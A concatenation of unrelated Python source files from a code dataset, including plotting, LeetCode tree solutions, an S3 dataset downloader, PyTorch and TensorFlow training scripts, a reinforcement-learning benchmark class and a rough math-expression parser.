gsTree.update(left=0, right=1, bottom=0, top=1, wspace=0.05)#, hspace=0.05)\n treePlot = plt.subplot(gsTree[1:-1, 1:-1])\n treePlot.set_xlim(left=axisMinValue, right=axisMaxValue)\n treePlot.set_ylim(bottom=axisMinValue, top=axisMaxValue)\n nodes = [patches.Rectangle((nodeCenterXValues[i] - (nodeWidth / 2), nodeCenterYValues[i] - (nodeHeight / 2)), nodeWidth, nodeHeight) if nodeDepths[i] < maxDepth\n else patches.Circle((nodeCenterXValues[i], nodeCenterYValues[i]), nodeWidth / 2)\n for i in range(len(nodeDepths))]\n patchplotting.graphGeneration(nodes, currentFigure=currentFigure, faceColors=['white'] * len(nodes), zorders=[-1])\n addtext.graphGeneration(nodeCenterXValues, nodeCenterYValues, nodeLabels, currentFigure=currentFigure, sizes=[30] * len(nodeLabels), zorders=list(range(len(nodeLabels))))\n linegraph.graphGeneration(treeEdgesXValues, treeEdgesYValues, currentFigure=currentFigure, markerSizes=[0] * len(treeEdgesYValues), zorders=[-len(nodes)])\n addtext.graphGeneration(edgeCenterXValues, edgeCenterYValues, treeEdgeLabels, currentFigure=currentFigure, sizes=[15] * len(treeEdgeLabels), zorders=list(range(len(treeEdgeLabels))))\n removeTickMarks(treePlot, xAxis=True, yAxis=True)\n plt.savefig(figureSaveLocation, bbox_inches='tight', transparent=True)\n
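\n # A hypothetical trace of the partition bookkeeping above, using the split arrays defined at the top of main(): following the left branches\n # x <= 5 (node 0), y <= 3 (node 1) and x <= 2 (node 3) reaches leaf '0', which appears in the partition plot created below as the rectangle [0, 2] x [0, 3].\n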
\n # Create the plot for the feature space partition.\n currentFigure = plt.figure()\n gsPartition = gridspec.GridSpec(10, 10)\n gsPartition.update(left=0, right=1, bottom=0, top=1, wspace=0.05)#, hspace=0.05)\n partitionPlot = plt.subplot(gsPartition[1:-1, 1:-1])\n partitionPlot.set_xlim(left=axisMinValue, right=axisMaxValue)\n partitionPlot.set_ylim(bottom=axisMinValue, top=axisMaxValue)\n rectangles = [patches.Rectangle((partitionXValues[i], partitionYValues[i]), partitionWidths[i], partitionHeights[i]) for i in range(len(partitionXValues))]\n patchplotting.graphGeneration(rectangles, currentFigure=currentFigure, faceColors=['white'] * len(rectangles), zorders=[-1])\n addtext.graphGeneration(partitionLabelXValues, partitionLabelYValues, partitionLabels, currentFigure=currentFigure, sizes=[20] * len(partitionLabels), zorders=list(range(len(partitionLabels))))\n setLabels(partitionPlot, xLabel=r'$x$', yLabel=r'$y$', yRotation=0)\n partitionPlot.xaxis.label.set_size(30)\n partitionPlot.yaxis.label.set_size(30)\n partitionPlot.set_xticks(range(int(axisMaxValue) + 1))\n partitionPlot.set_yticks(range(int(axisMaxValue) + 1))\n plt.savefig(figureSaveLocation + 'Partitions', bbox_inches='tight', transparent=True)\n plt.show()\n\ndef setLabels(axes, xLabel='', xRotation=0, yLabel='', yRotation=0):\n \"\"\"Set the X and Y labels of the axes.\n \"\"\"\n\n axes.set_xlabel(xLabel, rotation=xRotation)\n axes.set_ylabel(yLabel, rotation=yRotation)\n\ndef hideAxesLabelling(axes, xAxis=False, yAxis=False):\n \"\"\"Hides all tick marks, tick labels, axis labels, etc.\n \"\"\"\n\n if xAxis:\n axes.xaxis.set_visible(False)\n if yAxis:\n axes.yaxis.set_visible(False)\n\ndef removeTickMarks(axes, xAxis=False, yAxis=False):\n \"\"\"Removes all tick marks.\n \"\"\"\n\n if xAxis:\n axes.set_xticks([])\n if yAxis:\n axes.set_yticks([])\n\ndef removeTickLabels(axes, xAxis=False, yAxis=False):\n \"\"\"Removes the tick labels.\n \"\"\"\n\n if xAxis:\n axes.set_xticklabels([])\n if yAxis:\n axes.set_yticklabels([])\n\n\nif __name__ == '__main__':\n main(sys.argv[1])","sub_path":"src/examples/DecisionTreePartitions.py","file_name":"DecisionTreePartitions.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"493030646","text":"import pyscreenshot as ImageGrab\nimport cv2\nimport os\n\n\ndef capture_custom(box):\n im = ImageGrab.grab(bbox=(box['x1'], box['y1'], box['x2'], box['y2']))\n # save to to file for use with unique name\n filename = \"{}.png\".format(os.getpid())\n im.save(filename, \"PNG\")\n return filename\n\n\ndef grayscale(src):\n img = cv2.imread(src)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # not doing any noise removal or threshold preprocessing\n # it makes results worse in this case\n\n filename = \"{}.png\".format(os.getpid())\n cv2.imwrite(filename, gray)\n return filename\n\n\ndef cleanup(files):\n # clean up files after processing\n for file in files:\n os.remove(file)\n","sub_path":"ImageGrab.py","file_name":"ImageGrab.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"460732488","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/04/11 ##\n## Description: Leetcode #226 ##\n##############################################\n\n# Invert a binary tree.\n# \n# 4\n# / \\\n# 2 7\n# / \\ / \\\n# 1 3 6 9\n# to\n# \n# 4\n# / \\\n# 7 2\n# / \\ / \\\n# 9 6 3 1\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # @param root, TreeNode\n # @return TreeNode\n def invertTree(self, root):\n if root is None:\n return root\n root.left, root.right = root.right, root.left\n self.invertTree(root.left)\n self.invertTree(root.right)\n return root\n \n # @param root, TreeNode\n # @return TreeNode\n def preorderTraversal(self, root, ans):\n if root is None:\n return ans\n ans.append(root.val)\n self.preorderTraversal(root.left, ans)\n self.preorderTraversal(root.right, ans)\n return ans\n\n# Main\nif __name__ == '__main__':\n n0 = TreeNode(4)\n n1 = TreeNode(2)\n n2 = TreeNode(7)\n n3 = TreeNode(1)\n n4 = TreeNode(3)\n n5 = TreeNode(6)\n n6 = TreeNode(9)\n n0.left, n0.right = n1, n2\n n1.left, n1.right = n3, n4\n n2.left, n2.right = n5, n6\n \n print(Solution().preorderTraversal(n0, []))\n newRoot = Solution().invertTree(n0)\n print(Solution().preorderTraversal(newRoot, []))\n","sub_path":"Solutions/226_InvertBinaryTree.py","file_name":"226_InvertBinaryTree.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"649354110","text":"import boto3\nimport botocore\nimport constants as c\nimport tarfile\nimport os\ns3 = boto3.resource('s3')\n\ndef download_data(name, data_dir):\n file_name = '{}.tar.gz'.format(name)\n key = os.path.join(c.DATA_PREFIX,file_name)\n path = os.path.join(data_dir, file_name)\n print(\"Downloading dataset {} to dir {}\".format(name, data_dir))\n try:\n s3.Bucket(c.U6_DATASET_BUCKET).download_file(key, path)\n return path\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n print(\"The object does not exist.\")\n return None\n else:\n raise\n\n\ndef unzip_file(fpath, extraction_path = '.', strip_prefix = True, cleanup=True):\n print(\"Extracting file {}\".format(fpath))\n tar = tarfile.open(fpath)\n prefix = '/tmp' # this prefix is added from the u6 Dataset upload process\n for member in tar.getmembers():\n if strip_prefix:\n member.name = member.name.lstrip(prefix)\n tar.extract(member, extraction_path)\n tar.close()\n if cleanup:\n os.remove(fpath)\n\n\ndef download_and_unzip(name, data_dir):\n fpath = download_data(name, data_dir)\n unzip_file(fpath, data_dir)\n\n \n\n\n\n\n\n\n\n","sub_path":"datasets/download/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"370648736","text":"from ml_model import symcnn_model\nfrom dnn_model import dnn_model\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom create_dataset import Data_gener\nimport torch.autograd as autograd\nimport torch.optim as optim\n\nimport time\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\n\nDEVICE_ID = 0\nTFIDF = False\nBATCH_SIZE = 2048\nEMBEDDING_DIM = 64\nCONV_NUM_KERNEL1 = 700\nCONV_NUM_KERNEL2 = 32\nKERNEL_SIZE2 = 3\nKERNEL_SIZE1 = 5\nFC1_NUM = 128\nFC2_NUM = 64\nFC3_NUM = 32\nSTART_TRAIN_STEPS = 0\nEND_TRAIN_STEPS = 160100\nSTART_AUG_TRAIN_STEPS = 0\nEND_AUG_TRAIN_STEPS = 0\nINIT_LEARNING_RATE1 = 0.0001\nINIT_LEARNING_RATE2 = 0.00001\nTOP_10_HIT_GATE1 = 1.2\nTOP_10_HIT_GATE2 = 3\nINIT_MODEL_NAME = ''#'model-0.5550-pars-2018-05-15-06-56.pkl'\nDEBUG = True\nEXPER_COMMENT = 'continue with augmentation from zero streamline\\n embedding_dim %d\\n conv_num_kernel1 %d\\n kernel_size1 %d\\n conv_num_kernel2 %d\\n kernel_size2 %d\\n \\\nfc1_num %d\\n fc2_num %d\\n fc3_num %d\\n start_train_steps %d\\n end_train_steps %d\\n start_aug_train_steps %d\\n \\\nend_aug_train_steps %d\\n init_learning_rate1 %f\\ninit_learning_rate2 %f\\n init_model_name %s\\n TFIDF %d\\n' \\\n%(EMBEDDING_DIM, CONV_NUM_KERNEL1, KERNEL_SIZE1, CONV_NUM_KERNEL2, KERNEL_SIZE2, FC1_NUM, FC2_NUM, FC3_NUM, START_TRAIN_STEPS, END_TRAIN_STEPS, \\\nSTART_AUG_TRAIN_STEPS, END_AUG_TRAIN_STEPS, INIT_LEARNING_RATE1, INIT_LEARNING_RATE2, INIT_MODEL_NAME, TFIDF)\nINIT_TEST = True and (DEBUG == False) and (START_AUG_TRAIN_STEPS == 0) and (INIT_MODEL_NAME != '')\nprint(EXPER_COMMENT)\n\nexperiment_start_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\nif DEBUG:\n f_log = open('/home/ub102/change_recommend_pytorch/logs/debug.log','w')\n f_log.write('experiment_start_time:\\t'+experiment_start_time+'\\n')\nelse:\n f_experiment_log = open('/home/ub102/change_recommend_pytorch/logs/experiment_directory.log','a')\n f_log = open('/home/ub102/change_recommend_pytorch/logs/exper-%s.log'%experiment_start_time,'w')\n f_experiment_log.write(experiment_start_time+': '+EXPER_COMMENT+'\\n')\n f_experiment_log.close()\n f_log.write('experiment_start_time:\\t'+experiment_start_time+'\\n')\n f_log.write(EXPER_COMMENT+'\\n')\n\ng = Data_gener('wine', batch_size = BATCH_SIZE,TFIDF =TFIDF)\nfile_matrix = g.file_matrix.cuda(DEVICE_ID)\ngg = g.gener('train', augmentation=False)\nga = g.gener('train', augmentation=True)\ncriterion = nn.BCELoss()\nif not TFIDF:\n net = symcnn_model(embedding_dim = EMBEDDING_DIM, conv_num_kernel1 = CONV_NUM_KERNEL1, \\\nfc1_num = FC1_NUM, fc2_num = FC2_NUM, kernel_size1 = KERNEL_SIZE1, kernel_size2 = KERNEL_SIZE2,conv_num_kernel2 = CONV_NUM_KERNEL2).cuda(DEVICE_ID)\n#net.load_state_dict(torch.load('/home/song/change_recommend_pytorch/models/model-pars-first-night.pkl'))\n#net.load_state_dict(torch.load('/home/song/change_recommend_pytorch/models/model-0.8947-pars-2018-04-18-20-21.pkl'))\nelse:\n net = dnn_model(fc1_num = FC1_NUM, fc2_num = FC2_NUM).cuda(DEVICE_ID)\n\nif INIT_MODEL_NAME != '':\n net.load_state_dict(torch.load('/home/ub102/change_recommend_pytorch/models/'+INIT_MODEL_NAME))\n\ndef analysis_result(output, xy, label, loss, hit = False):\n mse_loss = float(loss.data)\n y_numpy = output.cpu().data.numpy().squeeze()\n y_around = np.around(y_numpy).astype('int64')\n label_np = label.cpu().numpy().squeeze().astype('int64')\n acc = (np.dot(y_around, label_np)+np.dot(1-y_around, 
1-label_np))/BATCH_SIZE\n auc = roc_auc_score(label_np, y_numpy)\n report_str = 'mse_loss: %.5f, acc: %.3f, auc: %.3f'%(mse_loss,acc,auc)\n if hit == True:\n sorted_ix = sorted(range(y_numpy.shape[0]), key = lambda x:y_numpy[x], reverse = True)\n hits_info = list(map(lambda x:label_np[x], sorted_ix))\n top_10_hit, top_10_hit_num = 1 if sum(hits_info[:10]) > 0 else 0, sum(hits_info[:10])\n top_5_hit, top_5_hit_num = 1 if sum(hits_info[:5]) > 0 else 0, sum(hits_info[:5])\n top_3_hit, top_3_hit_num = 1 if sum(hits_info[:3]) > 0 else 0, sum(hits_info[:3])\n top_1_hit, top_1_hit_num = 1 if sum(hits_info[:1]) > 0 else 0, sum(hits_info[:1])\n hits_info_sum = [hits_info[0]]+[0 for i in range(1,len(hits_info))]\n for i in range(1,len(hits_info)):\n hits_info_sum[i] = hits_info_sum[i-1] + hits_info[i]\n ap = np.dot(np.array([hits_info_sum[i]/(i+1) for i in range(min(100,len(hits_info)))]),np.array(hits_info[:100]))/sum(hits_info)\n return [report_str, mse_loss, acc, auc, [top_10_hit, top_5_hit, top_3_hit, top_1_hit], [top_10_hit_num, top_5_hit_num, top_3_hit_num, top_1_hit_num], ap]\n else:\n return [report_str, mse_loss, acc, auc]\n\ngt = g.gener('test')\nxy_t = next(gt)\nx_t = [autograd.Variable(file_matrix[i]) for i in xy_t[:2]]\nlabel_t = xy_t[2].cuda(DEVICE_ID) \ntarget_t = autograd.Variable(label_t)\n\ndef validation(val_interv):\n test_commits_size = len(g.test_commits)\n #test_commits_size = 200\n top_10_hits, top_5_hits = [[] for ix in val_interv], [[] for ix in val_interv]\n top_3_hits, top_1_hits = [[] for ix in val_interv], [[] for ix in val_interv]\n mse_losses, acces, auces = [[] for ix in val_interv], [[] for ix in val_interv], [[] for ix in val_interv]\n aps = [[] for ix in val_interv]\n for commit_ix in val_interv:\n if commit_ix%500 == 0 and commit_ix>0:\n print('test commit id:',commit_ix)\n for file_ix in range(len(g.test_commits[commit_ix][0])):\n left_samples, right_samples, label_samples = g.commit_validation_generation(commit_ix, file_ix)\n x = [autograd.Variable(file_matrix[i]) for i in [left_samples, right_samples]]\n label = label_samples.cuda(DEVICE_ID)\n output = net(x)\n target = autograd.Variable(label)\n loss = criterion(output, target)\n\n report_str, mse_loss, acc, auc, \\\n [top_10_hit, top_5_hit, top_3_hit, top_1_hit], \\\n [top_10_hit_num, top_5_hit_num, top_3_hit_num, top_1_hit_num], ap \\\n = analysis_result(output, [left_samples, right_samples, label_samples], label, loss, hit = True)\n top_10_hits[commit_ix-val_interv[0]].append(top_10_hit)\n top_5_hits[commit_ix-val_interv[0]].append(top_5_hit)\n top_3_hits[commit_ix-val_interv[0]].append(top_3_hit)\n top_1_hits[commit_ix-val_interv[0]].append(top_1_hit)\n mse_losses[commit_ix-val_interv[0]].append(mse_loss)\n acces[commit_ix-val_interv[0]].append(acc)\n auces[commit_ix-val_interv[0]].append(auc)\n aps[commit_ix-val_interv[0]].append(ap)\n top_10_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_10_hits)) )\n top_5_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_5_hits)) )\n top_3_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_3_hits)) )\n top_1_hit = np.mean( list(map(lambda x:sum(x)/len(x), top_1_hits)) )\n acc = np.mean( list(map(lambda x:sum(x)/len(x), acces)) )\n auc = np.mean( list(map(lambda x:sum(x)/len(x), auces)) )\n mean_ap = np.mean( list(map(lambda x:sum(x)/len(x), aps)))\n mse_loss = np.mean( list(map(lambda x:sum(x)/len(x), mse_losses)) )\n validation_report = ''\n validation_report += 'top_10_hit:\\t%.4f\\n'%(top_10_hit)\n validation_report += 'top_5_hit:\\t%.4f\\n'%(top_5_hit)\n validation_report += 'top_3_hit:\\t%.4f\\n'%(top_3_hit)\n validation_report += 'top_1_hit:\\t%.4f\\n'%(top_1_hit)\n validation_report += 'acc:\\t%.4f\\n'%(acc)\n validation_report += 'auc:\\t%.4f\\n'%(auc)\n validation_report += 'mean_ap:\\t%.4f\\n'%(mean_ap)\n validation_report += 'mse_losses:\\t%.4f\\n'%(mse_loss)\n short_report = 'top_10_hit: %.4f, top_5_hit: %.4f, top_3_hit: %.4f, top_1_hit: %.4f, mean_ap: %.4f, auc: %.4f'%(top_10_hit, top_5_hit, top_3_hit, top_1_hit, mean_ap, auc)\n return [validation_report, top_10_hit, top_5_hit, top_3_hit, top_1_hit, acc, auc, mse_loss, short_report, top_10_hits, top_5_hits, top_3_hits, top_1_hits]\n
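\n# Sketch of how the list returned by validation() is consumed elsewhere in this\n# script (index 8 is the one-line summary, index 1 the macro-averaged top-10 hit\n# rate; the printed text is hypothetical):\n# report = validation(range(10))\n# print(report[8]) # e.g. 'top_10_hit: 0.5500, top_5_hit: 0.4100, ...'\n# report[1] >= TOP_10_HIT_GATE1 # the gate test that train_with_gener applies\n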
\nif INIT_TEST:\n print('init test')\n val_report_data = validation(range(len(g.test_commits)))\n val_report = val_report_data[8]\n print(val_report)\n\n\ndef train_with_gener(gener,cnt, optim, top_10_hit_gate):\n xy = next(gener)\n x = [autograd.Variable(file_matrix[i]) for i in xy[:2]]\n label = xy[2].cuda(DEVICE_ID)\n\n output = net(x)\n target = autograd.Variable(label)\n loss = criterion(output, target)\n \n if cnt%100 == 0:\n output_t = net(x_t)\n loss_t = criterion(output_t, target_t)\n val_analysis = validation(range(10))\n short_report = val_analysis[8]\n top_10_hit = val_analysis[1]\n temple_report = '%05d: '%(cnt)+ analysis_result(output, xy, label, loss)[0] +'\\t validation:\\t' + short_report\n print(temple_report)\n f_log.write(temple_report + '\\n')\n if top_10_hit >= top_10_hit_gate:\n val_report_data = validation(range(len(g.test_commits)))\n val_report = val_report_data[8]\n top_10_hit = val_report_data[1]\n print(val_report)\n cur_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\n torch.save(net, '/home/ub102/change_recommend_pytorch/models/model-%.4f-%s.pkl'%(top_10_hit, cur_time)) \n torch.save(net.state_dict(), '/home/ub102/change_recommend_pytorch/models/model-%.4f-pars-%s.pkl'%(top_10_hit, cur_time))\n print('model_saved')\n return False\n if cnt%5000 == 0 and cnt > 0:\n val_report_data = validation(range(len(g.test_commits)))\n val_report = val_report_data[8]\n top_10_hit = val_report_data[1]\n cur_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\n torch.save(net, '/home/ub102/change_recommend_pytorch/models/model-%.4f-%s.pkl'%(top_10_hit, cur_time)) \n torch.save(net.state_dict(), '/home/ub102/change_recommend_pytorch/models/model-%.4f-pars-%s.pkl'%(top_10_hit, cur_time))\n f_log.write('model saved:\\t%s\\n'%cur_time)\n f_log.write(val_report)\n print(val_report)\n optim.zero_grad() # clear gradients left over from the previous step before backpropagating\n loss.backward()\n optim.step()\n return False\n\n# Timing probe: use the time module imported at the top of the file ('from time\n# import time' here would shadow it and break the time.strftime call below).\nt1 = time.time()\nval_report_data = validation(range(10))\nt2 = time.time()\nprint('use time %f' % (t2 - t1)) # parenthesized so the subtraction happens before formatting\nprint('num of inference %d' % (sum(len(c[0]) for c in g.test_commits[:10]))) # files scored across the 10 timed commits\n\n'''\noptimizer = optim.RMSprop(net.parameters(), lr=INIT_LEARNING_RATE1)\nfor cnt in range(START_TRAIN_STEPS,END_TRAIN_STEPS):\n if train_with_gener(gg, cnt, optimizer, TOP_10_HIT_GATE1):\n break\noptimizer = optim.RMSprop(net.parameters(), lr=INIT_LEARNING_RATE2)\nfor cnt in range(START_AUG_TRAIN_STEPS, END_AUG_TRAIN_STEPS):\n if train_with_gener(ga, cnt, optimizer, TOP_10_HIT_GATE2):\n break\n'''\n#val_report = validation()[0]\n#f_log.write(val_report)\nexperiment_end_time = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))\nf_log.write('experiment_end_time:\\t'+experiment_end_time+'\\n')\nf_log.close()\n\n#for i in range(6):\n# 
print(times[i,:].sum())\n","sub_path":"gpu_train_torch_model.py","file_name":"gpu_train_torch_model.py","file_ext":"py","file_size_in_byte":11005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"237434973","text":"# https://leetcode-cn.com/problems/maximum-depth-of-binary-tree/\n\nclass Solution:\n def maxDepth(self, root: TreeNode) -> int:\n '''DFS'''\n # def dfs(root, level):\n # if not root: return level\n # left = dfs(root.left, level+1)\n # right = dfs(root.right, level+1)\n # return max(left, right)\n # return dfs(root, 0)\n '''BFS'''\n if not root: return 0\n q = collections.deque([root])\n level = 0\n while q:\n for i in range(len(q)):\n node = q.popleft()\n if node.left: q.append(node.left)\n if node.right: q.append(node.right)\n level += 1\n return level","sub_path":"Week_03/104. 二叉树的最大深度.py","file_name":"104. 二叉树的最大深度.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"133297936","text":"#\n# Copyright (C) 2019 Luca Pasqualini\n# University of Siena - Artificial Intelligence Laboratory - SAILab\n#\n#\n# USienaRL is licensed under a BSD 3-Clause.\n#\n# You should have received a copy of the license along with this\n# work. If not, see .\n\n# Import packages\n\nimport logging\n\n# Import usienarl\n\nfrom usienarl import Experiment, Environment, Agent, Interface\n\n\nclass BenchmarkExperiment(Experiment):\n \"\"\"\n Benchmark experiment for OpenAI gym environments.\n\n It only uses a validation threshold to both validate and test. If validation is passed, the experiment is considered\n automatically successful.\n \"\"\"\n\n def __init__(self,\n name: str,\n validation_threshold: float,\n environment: Environment,\n agent: Agent,\n interface: Interface = None):\n # Generate the base experiment\n super(BenchmarkExperiment, self).__init__(name, environment, agent, interface)\n # Define internal attributes\n self._validation_threshold: float = validation_threshold\n\n def _is_validated(self,\n logger: logging.Logger) -> bool:\n # Check if average validation reward (score) is over validation threshold\n if self.validation_volley.avg_total_reward >= self._validation_threshold:\n return True\n return False\n\n def _is_successful(self,\n logger: logging.Logger) -> bool:\n # Check if validated\n return self.validated\n","sub_path":"benchmarks/src/benchmark_experiment.py","file_name":"benchmark_experiment.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"334757756","text":"import re\nimport math\n\n# KEY FORMAT:\n# Input -> Expression class -> Terms information -> Evaluate -> Expression class compacts expression -> repeat until result.\n\nclass Expression:\n # The Expression class will handle the markup of a string into\n # nested parenthesis, contain values during calculation,\n # and will attempt to create an ideal order for the \n # math system to calculate things.\n def __init__(self,string):\n self.original = string\n self.list = []\n self.Nests()\n print(self.list)\n self.values = []\n self.getValues()\n \n def Nests(self):\n # Tiers nests, also handles the remainder.\n nestStarts = 0 # Starts both at 0\n nestEnds = 0\n tmp = \"\"\n if self.original.count(\"(\")!=self.original.count(\")\"):\n raise SyntaxError(\"Inconsistent Parenthesis count. Did you make sure to close ALL parentheses?\")\n for char in self.original: # Character by Character detection :)\n if char==\"(\":\n if tmp!=\"\":\n self.list.append(tmp)\n tmp = \"\"\n nestStarts+=1\n self.list.append(\">\"+str(nestStarts))\n elif char==\")\":\n if tmp!=\"\":\n self.list.append(tmp)\n tmp = \"\"\n nestEnds = nestStarts\n self.list.append(\"<\"+str(nestEnds))\n nestEnds-=1 # Suggests completion of a tier, therefore backs out a tier.\n nestStarts-=1\n else:\n tmp+=char\n # PHEW!\n def modifyNests(self,newText, position):\n # Keep in mind that this will only replace one thing at a time.\n self.list[position] = newText\n \n def removeNests(self,tier,replacedValue,subbedValue):\n # Will remove nest levels if evaluation is finished within that level\n # Call this ONCE per replaced and subbed value.\n tmplist = []\n possibilities = \"<\"+str(tier)+\">\"+str(tier)\n for x in range (0,len(self.list)-1):\n if self.list[x] not in possibilities:\n if self.list[x]==replacedValue:\n tmplist.append(subbedValue)\n else: \n tmplist.append(self.list[x])\n self.list = tmplist\n\n \n def recombineNests(self):\n # Given that after modifying the nests the strings will be cut up\n # into tiny pieces, this method will glue them all together.\n tmp = \"\"\n tmplist = []\n for x in range (0, len(self.list-1)):\n paren = re.search(\"[<>]\",self.list[x])!=None # True if there are parenthesis indicators\n if not paren:\n tmp+=x\n if paren:\n tmplist.append(tmp)\n tmplist.append(self.list[x])\n tmp = \"\"\n self.list = (tmplist)\n \n def getValues(self):\n # This will return the actual, non-parenthesis strings.\n tmp = []\n for x in self.list:\n if len(re.findall(\"[()]\",x))==0:\n tmp.append(x)\n self.values = tmp\n \n\n \n \n\n \n\ne = Expression(\"(((a + b))(()))\")\ne.modifyNests(\"b\",3)\nprint(e.list)\n\n\nclass Evaluate:\n def __init__(self,in1,in2,operand):\n self.in1 = float(in1)\n self.in2 = float(in2)\n self.operand = operand\n self.result = autoMath()\n self.struct = {\"in1\": self.in1,\"in2\": self.in2,\"operand\": self.operand, \"result\": self.result}\n \n def autoMath(self):\n if self.operand==\"+\":\n return self.in1+self.in2\n if self.operand==\"-\":\n return self.in1-self.in2\n if self.operand==\"/\":\n return self.in1/self.in2\n if self.operand==\"*\":\n return self.in1*self.in2\n if self.operand==\"^\":\n return math.pow(in1,in2)\n else:\n return None\n \n def __str__(self):\n return str(self.struct)\n \n def value(self):\n return self.result\n\n\n\nclass Information:\n # The Information class will provide information for the basicOperands\n # class to regarding the arguments, the desired operation.\n def __init__(self,string):\n self.original = string\n if 
\n\nclass Information:\n # The Information class will provide information for the basicOperands\n # class regarding the arguments and the desired operation.\n def __init__(self,string):\n self.original = string\n if self.original==\"\":\n raise Exception(\"InputError: Invalid input\")\n self.ops = [\"*\",\"/\",\"+\",\"-\",\"^\"]\n if self.isSplitExpression(None):\n self.splitExp = self.splitExpression(None)\n self.original = self.splitExp[0]\n else:\n self.splitExp = None\n self.operators = self.getOp(None)\n self.arguments = self.getTerms(None)\n self.chain = self.getChain(None)\n \n self.struct = {\"original\":self.original,\"ops\": self.operators, \"args\": self.arguments,\"chain\": self.chain,\"split_expression\": self.splitExp}\n \n def getOp(self, string):\n # Figures out if operators are a thing.\n # TODO: Make operator regex set a variable?\n if string==None:\n string = self.original\n return re.findall(\"[+\\\\-*/^]\",string) # character class without commas, so ',' is never captured as an operator\n \n def isSplitExpression(self,string):\n # Figures out if the expression needs to be split.\n # TODO: Offload to the actual Expression class?\n if string==None:\n string = self.original\n if len(string)>3:\n return True\n else:\n return False\n \n def splitExpression(self,string):\n # TODO: Offload to the actual Expression class?\n ret = []\n if string==None:\n string = self.original\n ret.append(string[0:3])\n new = string[3:len(string)]\n while new!=\"\":\n ret.append(new[0:2])\n new = new[2:len(new)]\n return ret\n \n def getTerms(self, string):\n if string==None:\n string = self.original\n return re.findall(\"\\\\w\",string)\n \n def getChain(self, string):\n if string==None:\n string = self.original\n return re.findall(\"[+\\\\-*/^]|\\\\w\",string) # covers every operator in self.ops, including '^'\n def __str__(self):\n return str(self.struct)\n \n\ndef parse(string):\n final = []\n p = re.split(\"[()]\",string)\n for x in range (0,len(p)):\n if p[x]!=\"\":\n final.append(Information(p[x]))\n for x in final:\n print(str(x))\n print(p)\n \ndef interpreter(info): # the parameter must not shadow the Information class\n data = info.struct\n\n\n\n# parse(\"x+3+5+9\")","sub_path":"mathparser.py","file_name":"mathparser.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"104715555","text":"import xml.etree.ElementTree as ET\n\ntree = ET.parse('planets.xml')\nroot = tree.getroot()\n\nfor child in root:\n print(child.tag, child.attrib)\n for grandchild in child:\n \tprint('\\t', grandchild.tag, grandchild.attrib)\n \tfor grandgrandchild in grandchild:\n \t\tprint('\\t\\t', grandgrandchild.tag, grandgrandchild.attrib)","sub_path":"planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17672268","text":"from __future__ import absolute_import, division, print_function\n\nimport math\nimport os\nimport sys\nimport numpy as np\nimport scipy.misc\nimport tensorflow as tf\nfrom scipy.misc import imsave\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom util.dataset import make_dataset\nfrom util.metrics import cluster_acc, cluster_nmi\n\n#from deconv import deconv2d\nimport math\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom sklearn.mixture import GaussianMixture\n\nflags = tf.flags\nlogging = tf.logging\nlogging.set_verbosity(tf.logging.ERROR)\n\nflags.DEFINE_integer(\"batch_size\", 100, \"batch size\") #128\nflags.DEFINE_integer(\"updates_per_epoch\", 600, \"number of updates per epoch\") #1000\nflags.DEFINE_integer(\"max_epoch\", 1000, \"max epoch\") #100\nflags.DEFINE_float(\"learning_rate\", 0.01, \"learning rate\")\nflags.DEFINE_string(\"working_directory\", \"\", \"\")\nflags.DEFINE_string(\"logdir\", \"\", \"dir for tensorboard logs\")\nflags.DEFINE_integer(\"hidden_size\", 50, \"size of the hidden VAE unit\")\nflags.DEFINE_integer(\"T\", 10, \"level of truncation\")\nflags.DEFINE_float(\"lam\", 1.0, \"weight of the regularizer\")\nflags.DEFINE_integer(\"s\", 100, \"number of samples for testing\")\nFLAGS = flags.FLAGS\n\ndef variable_summaries(var):\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\ndef _weight_variable(name, shape):\n return tf.get_variable(name, shape, tf.float32, tf.random_normal_initializer(stddev=0.001))\n\ndef _bias_variable(name, shape):\n return tf.get_variable(name, shape, tf.float32, tf.constant_initializer(0.0, 